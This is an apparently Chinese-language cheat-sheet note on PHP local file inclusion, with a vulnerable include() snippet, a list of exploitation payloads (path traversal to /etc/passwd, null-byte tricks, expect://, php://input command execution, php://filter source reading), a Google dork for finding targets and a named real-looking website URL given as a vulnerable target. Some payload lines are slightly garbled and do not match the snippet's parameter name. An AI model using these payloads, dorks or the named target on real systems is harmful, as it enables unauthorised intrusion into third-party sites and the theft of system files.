LFI (local file inclusion vulnerability)本地文件包含

时间:2021-09-04 21:40:55

代码实例:

<?php

$file = $_GET['file'];

if(isset($file))

{

include("pages/$file");

}

else

{

include("index.php");

}

?>

 

利用方式:

/script.php?page=../../../../../etc/passwd

php?page=expect://id

?page=/etc/passwd%00

?page=/etc/passwd%2500

warpper://target

?page=php://input&cmd=ls

page=php://filter/convert.base64-encode/resource=

 

google hacking

inurl:index.php?page=

 

vulnerable website:

http://confituredebali.com/index.php?page=../../../../../../../../etc/passwd

LFI (local file inclusion vulnerability)本地文件包含